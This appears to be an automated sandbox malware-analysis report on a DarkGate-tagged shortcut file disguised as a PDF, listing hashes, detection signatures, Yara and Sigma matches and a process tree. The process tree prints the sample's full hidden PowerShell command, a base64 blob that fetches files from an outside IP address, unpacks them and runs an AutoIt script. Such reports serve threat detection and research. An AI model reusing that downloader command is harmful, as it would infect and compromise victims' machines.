Edit tour
Windows
Analysis Report
Integration.pdf www.skype.com.lnk
Overview
General Information
| Sample name: | Integration.pdf www.skype.com.lnk |
| Analysis ID: | 1558748 |
| MD5: | b9a147ecb1b7fa4dd90a38cb24af92ad |
| SHA1: | cd0df36b588951b7f3cfcfe71a4407ae5cb9f5ee |
| SHA256: | 50ab6b830ae08cd98703d057bf79e16b4fff71c4cc1a1a9c74ab3fa528c20711 |
| Tags: | DarkGateHUNlnkuser-smica83 |
| Infos: |   |
 | |
Detection
| Score: | 96 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for sample
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Malicious Base64 Encoded PowerShell Keywords in Command Lines
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Suspicious command line found
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
cmd.exe (PID: 3984 cmdline: "C:\Window s\System32 \cmd.exe" /c powersh ell -Windo wStyle Hid den -Comma nd "[Syste m.Text.Enc oding]::UT F8.GetStri ng([System .Convert]: :FromBase6 4String('J GFwcGRhdGE 9W1N5c3Rlb S5FbnZpcm9 ubWVudF06O kdldEZvbGR lclBhdGgoJ 0FwcGxpY2F 0aW9uRGF0Y ScpDQpJbnZ va2UtV2ViU mVxdWVzdCA naHR0cDovL zIuNTguNTY uMjQzL3ZtY XBpLnBkZic gLU91dEZpb GUgIiRhcHB kYXRhXHZtY XBpLnBkZiI 7IFN0YXJ0L VByb2Nlc3M gIiRhcHBkY XRhXHZtYXB pLnBkZiINC iMgUE9SVFV HQUwNCklud m9rZS1XZWJ SZXF1ZXN0I CdodHRwOi8 vMi41OC41N i4yNDMva2d odHllZC56a XAnIC1PdXR GaWxlICIkY XBwZGF0YVx rZ2h0eWVkL nppcCINCiM gUE9SVFVHQ UwgRlJBTkN FDQpBZGQtV HlwZSAtQXN zZW1ibHlOY W1lIFN5c3R lbS5JTy5Db 21wcmVzc2l vbi5GaWxlU 3lzdGVtDQp bU3lzdGVtL klPLkNvbXB yZXNzaW9uL lppcEZpbGV dOjpFeHRyY WN0VG9EaXJ lY3RvcnkoI iRhcHBkYXR hXGtnaHR5Z WQuemlwIiw gJGFwcGRhd GEpDQpTdGF ydC1Qcm9jZ XNzICIkYXB wZGF0YVxBd XRvSXQzLmV 4ZSIgIiRhc HBkYXRhXHN jcmlwdC5hM 3giDQojIFB PUlRVR0FMI EJSQUJVUw0 K')) | Inv oke-Expres sion" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5348 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 3456 cmdline: powershell -WindowSt yle Hidden -Command "[System.T ext.Encodi ng]::UTF8. GetString( [System.Co nvert]::Fr omBase64St ring('JGFw cGRhdGE9W1 N5c3RlbS5F bnZpcm9ubW VudF06Okdl dEZvbGRlcl BhdGgoJ0Fw cGxpY2F0aW 9uRGF0YScp DQpJbnZva2 UtV2ViUmVx dWVzdCAnaH R0cDovLzIu NTguNTYuMj QzL3ZtYXBp LnBkZicgLU 91dEZpbGUg IiRhcHBkYX RhXHZtYXBp LnBkZiI7IF N0YXJ0LVBy b2Nlc3MgIi RhcHBkYXRh XHZtYXBpLn BkZiINCiMg UE9SVFVHQU wNCkludm9r ZS1XZWJSZX F1ZXN0ICdo dHRwOi8vMi 41OC41Ni4y NDMva2dodH llZC56aXAn IC1PdXRGaW xlICIkYXBw ZGF0YVxrZ2 h0eWVkLnpp cCINCiMgUE 9SVFVHQUwg RlJBTkNFDQ pBZGQtVHlw ZSAtQXNzZW 1ibHlOYW1l IFN5c3RlbS 5JTy5Db21w cmVzc2lvbi 5GaWxlU3lz dGVtDQpbU3 lzdGVtLklP LkNvbXByZX NzaW9uLlpp cEZpbGVdOj pFeHRyYWN0 VG9EaXJlY3 RvcnkoIiRh cHBkYXRhXG tnaHR5ZWQu emlwIiwgJG FwcGRhdGEp DQpTdGFydC 1Qcm9jZXNz ICIkYXBwZG F0YVxBdXRv SXQzLmV4ZS IgIiRhcHBk YXRhXHNjcm lwdC5hM3gi DQojIFBPUl RVR0FMIEJS QUJVUw0K') ) | Invoke -Expressio n" MD5: 04029E121A0CFA5991749937DD22A1D9) 
Acrobat.exe (PID: 4024 cmdline: "C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\R oaming\vma pi.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) 
AcroCEF.exe (PID: 4808 cmdline: "C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 7204 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=20 76 --field -trial-han dle=1636,i ,147263647 2059308611 6,80680986 6571415555 8,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
svchost.exe (PID: 3160 cmdline: C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||